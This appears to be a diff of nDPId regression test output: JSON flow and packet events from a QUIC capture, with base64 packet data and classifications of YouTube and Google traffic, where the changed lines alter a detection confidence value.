+00749{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":423,"source":"quic.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980349,"flow_last_seen":1463060980349,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1463060980349,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.214.110","src_port":48445,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"i.ytimg.com","user_agent":"Chrome\/49.0.2623.87 Linux x86_64"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":424,"source":"quic.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980356,"flow_last_seen":1463060980356,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1463060980356,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.201.227","src_port":40030,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02237{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"quic.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1463060980356,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1463060980356,"pkt":"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\/AeiBYJKSGuhkAAAAQ2hyb21lLzQ5LjAuMjYyMy44NyBMaW51eCB4ODZfNjQAAAAAWDUwOQAAEAAeAAAAAQAAAEZJWEQ2AwEAAADwAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 
-00759{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":424,"source":"quic.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980356,"flow_last_seen":1463060980356,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1463060980356,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.201.227","src_port":40030,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"fonts.gstatic.com","user_agent":"Chrome\/49.0.2623.87 Linux x86_64"}} +00759{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":424,"source":"quic.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980356,"flow_last_seen":1463060980356,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1463060980356,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.201.227","src_port":40030,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"fonts.gstatic.com","user_agent":"Chrome\/49.0.2623.87 Linux x86_64"}} 
01482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"quic.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1463060980358,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":816,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":816,"pkt_l4_len":782,"thread_ts_msec":1463060980358,"pkt":"8IQvSpdgeJKcD6iOCABFAAMieqxAAEART+TAqAFp2DrS7oaGAbsDDnUSDaSWOQdzcSypUTAyNQKic+J8GjVsfJMsdsljddNYUoaFl0z7yC+b\/wr4VU+uLim9cSDoCfQ+BQHWf7axGI\/0otFRZnw6Kt8qBdaHMLIkdKcN8wdByZN\/oxJ5hHJiGBr5fiEEYQesGjd7ktKww8RLAeoDPzO5xHVx6UhHPdcfqLCO0OUirBVeLWv0B2O9yzbQVc1VH+bmliqhUEJvrnRG4cr78AW8g3wScWC4rwYpeJVk\/IAAQQ57Dki1DMwjrpTDHht\/5ZKfx0L6ARDMsMT4o5zF\/akZnbDa0ujEPexxAMZmDGeFTAQkCIMwA\/gA3J1r7aP1KpIssFW81KVjJ5iXRD5YwhMXjujhZlTD7FpkokyBosoiaYQ9OlBELgrsv\/9qDO2wxdYuRfMHHiN5v5dCIbRSeNjSHrD5k38mY1aUywqkMP+2CUbD2epWgY5pAU9yj7pwB44jlPLOPZlRDlPzYteeLN3w3AP\/lAuGaox0e\/nN6hJNNlHNcIQxZHPP2S1Nn2pwslhn\/VZ\/sLfiYbgNEJ7jii0Xgsq+CMf0fQRIuCSQdHqU2jrdN+ANDhT5dE3khD4eoPHs8vCv4BKfMl7gejkwwAW2mHRMOqa7T9bOfmL\/xQjsgJk39nF1RjCMAK12Xi+dtOGE9IgQxbz9zSmgmL2yfIbOnXdI+bTM22zfHQn6FUtzcayZDzqJ6V1SbCofsr53iOUBUvhiUNinYAVziLfoiiMvfHEE5p0lanDdKZb0YpgPqdNQd16jKwJjqhYbmKL4sSrdZfI7oqtHDzJwMafbASoNSGD3Uv4mKwYKsjq2Gt5i5gDh3DTXlk8HfNKd3wJG6rjWcXbXKzMhv54KIsq1aZ1I4i1ag8lQ0v10wAGcat1qElIOAsfiTGWepgC8HR8kDowOKSvfud74VVvyn31uOyJudA\/cCGuSQ\/d7qs9IBWEXiAAAuMK7hXoYMc\/2wJckDypsBIy3x5hskbJa1d0Ahy9jqEdMlnrF69g47VNiGR6icm7nProfol9M2gJRYOL9DgN\/"} 
02263{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"quic.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1463060980361,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1463060980361,"pkt":"eJKcD6iO8IQvSpdgCABFAAViEvYAADMR8Kas2RAEwKgBaQG7smUFTookAAGQybRh4NjU1uL582WDWYRD2dtjLe0ntuD1Rv2\/b2fKGeJD6xTTVAUMsP2lDwoVXXJwitAjM1Ss3TeNIyNiPaVEHvBHWgnmTCyfAFo80jSe0xJw6Ybz6w3BHKed9Mf4LC34oG\/VIDlHTxzV6KkXcvqfJ+U14RSVhKW3KAUcxQl5Qnl+FE6bIGsShbMSV6P+UWlpqynVxRJTYzRSpGWAchBBRlF7EhFWsrYnblyXrD3VTjEqg879fRXYm2D6G+l3V3l4hCc8odvANTzc501Sej7x6oDCtVRndJ56LpiERNpHUkSjmM00+Wy1dbMT\/Vm99GrTmWmQ58Bhd7+x\/sycdH8p6kPEaBRymR3LuujKz\/Gp3cYG3YCBKEJqKQbhAu5X3FQ9PXBc+M62o93W9PU8b6NIWgn7PPkt\/looi8HdoxE9N0Q1KeX\/DgvtM+nwxVmrskJK6Thzut4c\/pKoeIdgzgc3\/jHyNkNEOaEuYipEhpS0\/Q+tOI16w+YZPxlDlM2uXgEDMcZKpZ3i643hutLioOhndNrgTa+7hlc5d+9fBUPIG4kEo\/3qe\/1sIW96DdumLgeq7hN8q9ipK\/OYJXgatYkOUytQ0BidBbi0s1rXKIV0\/20SDyn2cTxo7WHBdcfDH2uOAi\/TCrRfDAaRNQYOzMWy\/oZuiEP4GWby88PrtsqP7zlBhlOROw4HDIjA48YJ3izoMulzCHWEfBSraR6GRvLlvTobSdvt\/z+UVvoGEaNUxGfD3NV\/ys6k8iURbaIUpy8FqGPXqO5y1+eef+JbMhHxVscn06dBggRMWGOOEqj0iilT1RKBH9sFsvyyAlIRcyu73\/dSHY+X7jFjSREVA2KvZo6yurWHJdfQmRknszSHCEHvhyALYDYo7SRCnZFDn5E9W3gfJx9JMvRGkKHXuxSF3xLvoY5nZEGBaR+XmmVlyrTJABRhDpbAmZ5n4r9hBYxhQHxcHxiGFFAZf8z0g25Mt1TpS14HKgYd19UYag4E9v9SK0NipYTC9fTFM1QGWJgR0BKWBdAxjVtOeAxGYzbRhH6dsuYtciI4zHHsc2k8CUrpT7INwMysA9v0qD2r5uYmQ8cWNQI093fnUkc1ZiLc0jIwKw1r5S6aXpzTXj770vHeucOObKGH\/cu1fclnWip+hpVKiVNyqyTuHufVLPShgYbyGVCuWpZPLDtm2Jgl78SGXcMPJqMT\/eMThOsXIuSLcIkh41PVNQKxF5sBj\/BOj5ESvnmDK6QkupJ4WgD36Qg55pRhbyhTXn3wlt2Wr\/yvzjY+U2Y7nfQG6dNeCf\/ZR4o941mW0nR93XyOa+USW4ElVSAKkaXcwrIvcK8SdED4dYTXRprenIgGMn8eEVkFhh5c+SVUq+XERE8IzY1QaFHpJZP8fwhzTmsejKR4iNGy5hDCfipCmLS34n3Ti+BCtXRamD+5SfxUJJlOaGuDx1ZxsJ+DRIsQP+0kLMojxKXXv8fxv+kjUQYTnOJebQGi1vj1CqRIxf5a70YpuiubpyNGMG3LRDDgT1bz3u8MXC
O6UUeWAw7iQ0bpGgmPr47zuIVkRhe2cIWsbNBRCq+DfTxqyI5xdGH+ZdSvdGdcCnw7eeyZKURtoMVPU9ujTUcxOz5LcEN\/TxALvQe7jb0VWnhZrurBM\/tZX7uY\/NVzfAVeTgxdzrV78G5uYYEagOMAWzfqvOVOd0DJVYOhYStQVf878CnlBQP9yq8zVHiaudHd7jYBpAflemve6zr2sCq3IlfpR3vKBjLqbY7vKTWflGz9T6iOy4tB+9SN2sXj4A2cmfb4"} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":427,"source":"quic.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980364,"flow_last_seen":1463060980364,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1463060980364,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.201.238","src_port":55934,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02242{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":427,"source":"quic.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1463060980364,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1463060980364,"pkt":"8IQvSpdgeJKcD6iOCABFAAViJrhAAEARqpjAqAFp2DrJ7tp+AbsFTrs0DdvEpLUMteNnUTAyNQF\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\/bhdbtR7MQzwZCntatSQ+G8ewpnq2IX6bmQGJ6u0gPE\/alKxhVCh5gNqzZa48ANz\/fzn8t\/OZMVjaOBqhnSl8gs5MAKWKvx2rs4aeJgBO0M1ar5HmEtqD1e+f9L6rfh+tUTAyNXsm6efkXHH\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"} 
-00749{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":427,"source":"quic.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980364,"flow_last_seen":1463060980364,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1463060980364,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.201.238","src_port":55934,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"s.ytimg.com","user_agent":"Chrome\/49.0.2623.87 Linux x86_64"}} +00749{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":427,"source":"quic.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980364,"flow_last_seen":1463060980364,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1463060980364,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.201.238","src_port":55934,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"s.ytimg.com","user_agent":"Chrome\/49.0.2623.87 Linux x86_64"}} 
00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":428,"source":"quic.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1463060980377,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":1463060980377,"pkt":"eJKcD6iO8IQvSpdgCABFAABtTPkAADMRu5ms2RADwKgBaQG7ng0AWd\/uADd2O2oBZL+pVdP7tzva+fHvZhkEEtFfk705wPfWHPtzaQLZxSHnInASbTD2097V+S960VCK+SG68+SzP6VbXn8\/e\/F4Y7OlxWw39RE6om32"} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":429,"source":"quic.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980378,"flow_last_seen":1463060980378,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1463060980378,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.225","src_port":53817,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02242{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":429,"source":"quic.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1463060980378,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1463060980378,"pkt":"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\/86cd6fedmETl+HX+i21qzSEiNb4OJfB1Z4x91CByMieITzxdi32+v4DBxDEfj4iCcg46VL\/PH8fxOKMEzAFEjMjm3TRFNLXbtT6qGv6iFQOxYDkzP0ABTP7FYiXHH9noNffRk12UTAyNXsm6efkXHH\/AeiBYJKSGuhXNIn02TPR2k9zoZDH1PYmCZf2Zt1J713FQWCpFni4GGQAAABDQzIwQ2hyb21lLzQ5LjAuMjYyMy44NyBMaW51eCB4ODZfNjQlEdwQCcHdE7bz3Yek8lX\/AAAAAFg1MDkAABAAHgAAAHebYWUW7CksegbNUHmoS00JCUhXrcp5peVS86L6lokeAQAAAEMyNTVGSVhEYnkO9pznNwziYxqCfXGFX0ALe5CprnnrLQMBAMirDAfWX8CjXhckfelJ8XlBmAh34iT31gIDz8lnlm4Q\/bpdZ31E6\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"} -00751{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":429,"source":"quic.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980378,"flow_last_seen":1463060980378,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1463060980378,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.225","src_port":53817,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"yt3.ggpht.com","user_agent":"Chrome\/49.0.2623.87 Linux x86_64"}} 
+00751{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":429,"source":"quic.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980378,"flow_last_seen":1463060980378,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1463060980378,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.225","src_port":53817,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"yt3.ggpht.com","user_agent":"Chrome\/49.0.2623.87 Linux x86_64"}} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":430,"source":"quic.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1463060980388,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1463060980388,"pkt":"8IQvSpdgeJKcD6iOCABFAABBHBJAAEARn6vAqAFprNkQBLJlAbsALZ9GDEPl1BjSnP0KAohkBW4mjqf+lWrwMPohYA0CsIfpCV\/yUKbgEg=="} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":431,"source":"quic.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1463060980404,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1463060980404,"pkt":"8IQvSpdgeJKcD6iOCABFAABBthxAAEARBaLAqAFprNkQA54NAbsALeHSDKM2rKXAEd7wI3gnMNVg\/Bju+TzyuAKq97AJFlbG89vA9kIRtA=="} 
02257{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":432,"source":"quic.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1463060980407,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1463060980407,"pkt":"eJKcD6iO8IQvSpdgCABFAAVi+XIAADIRHN7YOtLuwKgBaQG7hoYFTgeIDKSWOQdzcSypAcCvMwGYTq6shxzW1ACAAVJFSgAGAAAAU1RLAHIAAABTTk8AqgAAAFBST0bxAAAAU0NGR4QBAABSUkVKiAEAAENSVP9UBQAA1qWbZaKGGMNu4n0IFd5qvoUTzfScMrQM62F5Klyoy\/gr13Knz1tigfd0ZqNrTwQKxsh0E3PeOsScdXLYKjs8qyiEuOy1a7C4zg63fuUtHJYgH7qkJ5NPVCX92UrREjVCY9dWARG+L7cbZT7AgaahFE1+Dc9xqUra0W3ZNGbmcka6SHMYwJHMeW3B7eVH3uELXrdKJ+QLpbj4b09tDQ\/XNJTmasaKcqcHQQkwRQIgPMYj0Pf7PCP2uxgZgQXPwKb2tHTcOJUmmbK8MQNIgfsCIQDeu6cth5DDb1874iP6IpBL709rtt3G3ayeVYw33VYBN1NDRkcHAAAAQUVBRAgAAABTQ0lEGAAAAFBETUQcAAAAUFVCUz8AAABLRVhTQwAAAE9CSVRLAAAARVhQWVMAAABBRVNHQ0MyMO4xNazIxw51CPh92NozyjFDSElEIAAArqfGpWlX\/ID+ijs5XuaY5l76DioG\/jdi0YAeXXF\/CmtDMjU1eOLS2hoopbZAEzdXAAAAAA0AAAABAwHogWCSkhroAwAAAAN7Junn5Fxx\/wAAAAAA\/wYAAHi7c1AtxPvNxgAsudi+GzSx3oe04Tic2NatWf922kf0hhwVG1mgwsAMmIdMgPkF1p4zMDcyN7AwtgR1otKwWsXBw+UMTDdp+UV5mYmwBMnOw+ubX5pXAkpdYZmp5XB38SC7S9RAGOwuHh4tYJiChMGRGwkUZgf68ZwtsPnBAWYwM7IzOzGwvF91fdMNT2Ud1a7MlSledVlybaZOW\/IT25eYrq8qUp7OLmq33YHB9tcRfpb4rOn2rfYyM5bOl9xpdepuGi\/LiYsHpi9uYuk3aGLpJlSANTGD+wiCLE3MrkCOYxOKA5t4tfQS81KK8jPBDZ4mMSC3oCA1Lz0zLxVZmZCWXnJOfmkKspgYzCDdxLzEnMqSzORisDg3woJEZE5OEx+S1XqZeaj8rAJUfml2Ez+yU\/USi9AFStEEktBVJOejCeRWoAmUoGspy0Nyc0oqEie1GImTVoTEyShF4mSWIHHycpA4BSicElCgQjiJKcAiABJ4cMdARPKaRGACQNncVGCLAqxMECZalpmSmg8WAsVrcQmwYEwGaeNF4gEluYDcshJDJLYRmA00PTe1pAioClk10Chg2yUjE1xANQmAeDloMV+ZX1pSmpSqm5efnJ+fnQlPTFBxNGWpKaWQKhyWQICpJTcdzJGCJ7+czNS8kmJke7iRkyYLSH0TG1Aa2MZpEsGa9LiQkyyWYONC8hYXuGiGmMYBdqdeEjC6kT0ggs35SA0q9gaDDKRiOQZYsGgjFbjy0DKwIDsTyVf67p6O7kbgElUbqQyHKYYGgyGyDlC5jtTI273NV8E2Yd+C1ye2dnFOb2eeVW6ug9bQQS6rsfaMFCEtB2DVhdYd4WBjS2\/kARbTBgaQpo6mgbqB6gLlBYq
E\/JODrSszjftYydWvQWHrJl8LaGcoCDtX+zF57w+1k7kVtnVpynvVDocqpnI0GGrun+excBbbk\/WtwdM1pruv4DC9rbrjjuzUh5nbWX\/pvc8t5nyiovfjwmtmI4UJXPKZTu5BF9\/Zcy1\/ucu1+fj1my\/1QiLLjwa6eC40ny7X1+yaMeXv6+AnN8+Hscy0b3aWiM\/4f24pi0LZ9UUc95\/XzHjyptDwc\/Gl7CxFnY+ZRZOXZM9a4Our\/25u"} 
@@ -46,22 +46,22 @@ 02249{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":443,"source":"quic.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1463060980446,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1463060980446,"pkt":"eJKcD6iO8IQvSpdgCABFAAVi7JoAADERM7bYOsnuwKgBaQG72n4FTiSvDNvEpLUMteNnAaUNyY55Ftxcp3QgTgCAAVJFSgAGAAAAU1RLAHAAAABTTk8AqAAAAFBST0bvAAAAU0NGR4IBAABSUkVKhgEAAENSVP9SBQAAJy7nP96y9QV42MKrzfRCPLT87WDRH7Fd5bV2IYJV5uerSuKcuz27mxBT4+gnyC4BMUrik01sKIil0iRgGwZXZriX2eqvjy0wvoZPR2mR64H2U8+GZaQSd+4vVoONHW5kMsgcr5Q\/br7AM9doxRgjn+8O22aMyRRKIbkIgECxfZ+3gPhZwCGzY3E1Vh0YGcUrXggtX0cSYrBSP4FN90wRk2Ud5VnIkrPbMEUCIQD6BAJQX5LoIPZW+skklsA6cQo9kEO8kehkPXFxP3LI1QIgI\/gkfWgDPoL5UerIs+RuGzTUGbty897xHCg0JJUpIv9TQ0ZHBwAAAEFFQUQIAAAAU0NJRBgAAABQRE1EHAAAAFBVQlM\/AAAAS0VYU0MAAABPQklUSwAAAEVYUFlTAAAAQUVTR0NDMjCzHyexPo2T9WCZD4U6m8alQ0hJRCAAAN5dryiyxa3rgUlMMcjfu+Bv+FmXvUMT6V4zrZRMsB8LQzI1NSKpyEIGkw80gGo2VwAAAAANAAAAAQMB6IFgkpIa6AMAAAADeybp5+Rccf8AAAAAAP8GAAB4u3NQLcT7zcYALLnYvhs0sd6HtOE4nNjWrVn\/dtpH9IYcFRtZoMLADJiHTID5BdaeMzA3MjewMLYEdaLSsFrFwcPlDEw3aflFeZmJsATJzsPrm1+aVwJKXWGZqeVwd\/Egu0vUQBjsLh4eLWCYgoTBkRsJFGYH+vGcLbD5wQFmMDOyMzsxsLxfdX3TDU9lHdWuzJUpXnVZcm2mTlvyE9uXmK6vKlKezi5qt92BwfbXEX6W+Kzp9q32MjOWzpfcaXXqbhovy4mLB6YvbmLpN2hi6SZUgDUxg\/sIgixNzK5AjmMTigObeLX0EvNSivIzwQ2eJjEgt6AgNS89My8VWZmQll5yTn5pCrKYGMwg3cS8xJzKkszkYrA4N8KCRGROThMfktV6mXmo\/KwCVH5pdhM\/slP1EovQBUrRBJLQVSTnownkVqAJlKBrKctDcnNKKhIntRiJk1aExMkoReJkliBx8nKQOAUonBJQoEI4iSnAIgASeHDHQETymkRgAkDZ3FRgiwKsTBAmWpaZkpoPFgLFa3EJsGBMBmnjReIBJbmA3LISQyS2EZgNND03taQIqApZNdAoYNslIxNcQDUJgHg5aDFfmV9aUpqUqpuXn5yfn50JT0xQcTRlqSmlkCoclkCAqSU3HcyRgie\/nMzUvJJiZHu4kZMmC0h9ExtQGtjGaRLBmvS4kJMslmDjQvIWF7hohpjGAXanXhIwupE9IILN+UgNKvYGgwykYjkGWLBoIxW48tAysCA7E8lX+u6eju5G4BJVG6kMhymGBoMhsg5QuY7UyNu9zVfBNmHfgtcntnZxTm9nnlVuroPW0EEuq7H2jBQhLQdg1YXWHeFgY0tv5AEW0wYGk
KaOpoG6geoC5QWKhPyTg60rM437WMnVr0Fh6yZfC2hnKAg7V\/sxee8PtZO5FbZ1acp71Q6HKqZyNBhq7p\/nsXAW25P1rcHTNaa7r+Awva26447s1IeZ21l\/6b3PLeZ8oqL348JrZiOFCVzymU7uQRff2XMtf7nLtfn49Zsv9UIiy48GunguNJ8u19fsmjHl7+vgJzfPh7HMtG92lojP+H9uKYtC2fVFHPef18x48qbQ8HPxpewsRZ2PmUWTl2TPWuDrq\/9ubtJn"} 02240{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":444,"source":"quic.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1463060980446,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1463060980446,"pkt":"eJKcD6iO8IQvSpdgCABFAAVi7JsAADERM7XYOsnuwKgBaQG72n4FTodMDNvEpLUMteNnAjCUFcdtv6XHZbkQxgCkAS0FXQCLsNsKswVSG3lP+qzvmF246uDhGtUyFwaTzRJRxS8XOFxmLluatV\/uy7O6p0+N2bQ\/+Zrt1fpZeW6648bpNyd9YDE3eJJ8v\/9lvMKhkrynd\/W+TFqduscYADp6WRYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
